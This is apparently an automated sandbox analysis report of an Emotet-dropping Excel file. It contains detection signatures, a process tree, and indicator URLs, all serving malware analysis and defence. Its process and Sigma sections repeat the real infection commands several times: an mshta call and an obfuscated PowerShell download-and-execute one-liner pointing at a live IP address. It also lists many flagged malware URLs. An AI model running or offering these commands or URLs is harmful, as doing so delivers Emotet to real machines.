Edit tour

Windows Analysis Report
imedpub_8.xls

Overview

General Information

Sample Name:	imedpub_8.xls
Analysis ID:	562400
MD5:	e5e714cb6407688c4d57a5ac96c09047
SHA1:	8f46f78706d2530efb3e8b2fb843bf7baef60cab
SHA256:	a62bbd0c4dd80047a998ef3fe2670658ee890ffed8ad7775539967b665e2d001
Tags:	SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected Emotet

Antivirus detection for URL or domain

Found malicious Excel 4.0 Macro

Sigma detected: Windows Shell File Write to Suspicious Folder

Sigma detected: Suspicious MSHTA Process Patterns

Document contains OLE streams with names of living off the land binaries

Sigma detected: Microsoft Office Product Spawning Windows Shell

Sigma detected: Suspicious PowerShell Command Line

Powershell drops PE file

Sigma detected: MSHTA Spawning Windows Shell

Found Excel 4.0 Macro with suspicious formulas

Machine Learning detection for dropped file

Sigma detected: Mshta Spawning Windows Shell

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Drops PE files to the application program directory (C:\ProgramData)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs DNS queries)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Downloads executable code via HTTP

Document misses a certain OLE stream usually present in this Microsoft Office document type

Enables debug privileges

Found a hidden Excel 4.0 Macro sheet

Potential document exploit detected (unknown TCP traffic)

PE file contains an invalid checksum

Searches for the Microsoft Outlook file path

Drops PE files

Uses a known web browser user agent for HTTP communication

Yara detected Xls With Macro 4.0

Creates a window with clipboard capturing capabilities

Document contains embedded VBA macros

Potential document exploit detected (performs HTTP gets)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2092 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

cmd.exe (PID: 2968 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

mshta.exe (PID: 2804 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)

powershell.exe (PID: 800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)

cmd.exe (PID: 1256 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)

cleanup

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
imedpub_8.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x12ca2:$s1: Excel 0x13d08:$s1: Excel 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
imedpub_8.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\imedpub_8.xls	SUSP_Excel4Macro_AutoOpen	Detects Excel4 macro use with auto open / close	John Lambert @JohnLaTwC	0x0:$header_docf: D0 CF 11 E0 0x12ca2:$s1: Excel 0x13d08:$s1: Excel 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\imedpub_8.xls	JoeSecurity_XlsWithMacro4	Yara detected Xls With Macro 4.0	Joe Security
C:\ProgramData\JooSee.dll	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Overview

System Summary

Sigma detected: Windows Shell File Write to Suspicious Folder

Source: File created

Author: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2804, TargetFilename: C:\Users\user\AppData\Local

Sigma detected: Suspicious MSHTA Process Patterns

Source: Process started

Author: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2968, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2804

Sigma detected: Microsoft Office Product Spawning Windows Shell

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2092, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2968

Sigma detected: Suspicious PowerShell Command Line

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Sigma detected: MSHTA Spawning Windows Shell

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Sigma detected: Mshta Spawning Windows Shell

Source: Process started

Author: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2804, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 800

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: imedpub_8.xls

ReversingLabs: Detection: 16%

Antivirus detection for URL or domain

Source: http://maxtdeveloper.com/okw9yx/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/PE3	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/f	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.png	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-adm	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/	Avira URL Cloud: Label: malware
Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/PE3	Avira URL Cloud: Label: malware
Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/97v/PE3	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/	Avira URL Cloud: Label: malware
Source: https://property-eg.com/mlzkir/9	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/PE3	Avira URL Cloud: Label: malware
Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/	Avira URL Cloud: Label: malware
Source: http://it-o.biz/bitrix/xoDdDe/	Avira URL Cloud: Label: malware
Source: https://gudangtasorichina.com/wp-content/GG01c/	Avira URL Cloud: Label: malware
Source: http://totalplaytuxtla.com/sitio/DgktL3zd/	Avira URL Cloud: Label: malware
Source: http://activetraining.sytes.net/libraries/8s/	Avira URL Cloud: Label: malware
Source: http://gardeningfilm.com/wp-cont	Avira URL Cloud: Label: malware
Source: http://jurnalpjf.lan.go.id/assets/iM/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3	Avira URL Cloud: Label: malware
Source: http://bimesarayenovin.ir/wp-admin/G1pYGL/	Avira URL Cloud: Label: malware
Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3	Avira URL Cloud: Label: malware
Source: http://91.240.118.172/gg/ff/fe.html	Avira URL Cloud: Label: malware

Machine Learning detection for dropped file

Source: C:\ProgramData\JooSee.dll

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: wC:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbgement.Automation.pdbBBK source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbE source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: anagsymbols\dll\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: `C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.661976040.0000000002B07000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000006.00000002.665123368.000000001C64E000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\cmd.exe

Source: global traffic

DNS query: name: hostfeeling.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic

Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80

Source: Joe Sandbox View

ASN Name: GLOBALLAYERNL GLOBALLAYERNL

Source: global traffic	HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
